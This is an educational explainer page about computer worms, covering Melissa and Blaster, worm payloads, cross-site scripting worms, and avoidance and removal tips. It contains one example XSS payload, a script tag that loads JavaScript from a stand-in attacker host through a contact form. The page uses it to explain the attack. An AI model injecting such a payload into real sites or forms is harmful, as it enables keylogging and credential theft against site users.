Worm

Worms Directory

A worm is a network form of a virus that usually eats away at bandwidth and disrupts Internet and Intranet connectivity. Because they replicate so fast and so quickly, they do harm to user productivity.


Worms: The Network Version of a Virus

A virus is usually a standalone program that infects one machine. It spreads through email or file sharing among users. A worm, however, is a network form of a virus that usually eats away at bandwidth and disrupts Internet and Intranet connectivity. Worms are usually “payload free,” but because they replicate so fast and so quickly, they do harm to user productivity due to network transmission performance degradation.


A Brief History of Computer Worms

Computer worms have been around since networks were invented. Probably some of the most notable worms were created in the 1990s. These worms spread through email. Imagine employees with hundreds of contacts in their Outlook application. Common worms would grab these contacts and self-replicate by emailing itself to every contact in the list. All it took was one person to open the virus file and hundreds and thousands of more users were sent an email. Bandwidth wasn’t as large as it is today, so a well coded worm could completely devastate a corporate network. Some companies were forced to shut down their company email servers until the problem was resolved.

Network Icon

One popular worm in the 1990s was Melissa. This worm took advantages of macros. A user would open an infected file, and the virus would send a copy of itself to the first 50 people in an Outlook email contact list. The worm was benign, but the massive amount of bandwidth needed to spread the worm as it continually spread on corporate networks and the Internet caused companies money in productivity and downtime.

Other worms are more malicious. In 2003, the Blaster worm spread to Windows 2000 and XP computers. It then used the computer resources to send attacks to windowsupdate.com. Because it used port 80 (the universal web port), firewalls didn’t stop the worm and allowed an unfettered attack on the Windows update website. Microsoft later shut down the site and forwarded it to windowsupdate.microsoft.com to mitigate damages.

These are just two common worms that were notable in the virus industry. Several more have been created by malware coders.

The takeaway when it comes to understanding worms is that their aim is to replicate quickly across a network. The payload depends on the worm creator, but many worms are harmless to a local machine since the creator’s target is a local network or corporate web server.


What Does a Worm Do?

Worms have a number of payloads. While self-replicating quickly is the most obvious, they often come with a secondary payload. The self-replication causes bandwidth issues and slowness on a user’s network, but they sometimes do other damage to a user’s personal information and files.

If the worm is meant just to spread and be a minor annoyance, they mainly just self-replicate through various online channels. They can send their own files using IM, IRC, ICQ, email, and even FTP. The worm sends itself to an FTP server where it can be shared with other users who find the file on the Internet using search engines.

More recently, worms have evolved to include web servers as a source for replication. The technique is called cross-site scripting (XSS). The hacker is able to gain access to a site using JavaScript submitted through an online form. For instance, the hacker sends the following value through a contact page:

<script src=”hackersite.com/hack.js”></script>

When an employee opens the content in a web application, the hacker’s JavaScript file is embedded in the code. The JavaScript code can then be used to log keystrokes or trick users into sending sensitive information such as a user name and password (commonly known as phishing). If the hacker is successful, he captures this information and logs into the web application using the user’s credentials. If the user has access to any customer data or corporate documents, the hacker is able to steal them for his own use.

XSS is a common hack that is used on insecure web servers. Several of these worms have been created over the years. They usually target high volume websites where the hacker can gain access to thousands of users in a short amount of time. Since worms usually trigger suspicion from educated users, the goal is to gain access to as many user names as possible before the XSS worm is removed.


How Do You Avoid Worms?

Email Icon

The best way to avoid a worm is to be suspicious of emails that don’t look normal. By “normal,” we mean that the email from your friend doesn’t have anything attached but a file or an embedded link. Most email systems block malware and send it directly to a user’s spam folder, but occasionally they get through. Don’t open random links or files sent by people you don’t know.

With XSS worms, it’s much more difficult. Most users have no idea that a website is compromised unless the site is flagged. FireFox and Google use an API that flags websites if XSS malware is found on it. The site owner is forced to fix it to stop a browser from flagging a site as containing malware.

Worms also work through macros. If you use Microsoft Office, disable macros when you open a file from someone you don’t know. Whether it’s from an office or a friend, it’s best to disable macros unless you need them with your day to day work.


Removing Worms

For self-replicating worms that have no payload other than sending content to your contacts, just delete the file and the email associated with it. With no payload, there is no damage to your machine. You could be courteous and send an email to recipients to let them know that the email is fraudulent.

If the worm comes with a payload, the first thing to do is cut off Internet connectivity. Since most worms send an attack to a web server, removing Internet connectivity will stop the attack. You can then run a full scan on your computer using an antivirus application.

© Solvusoft Corporation 2011-2023. All Rights Reserved.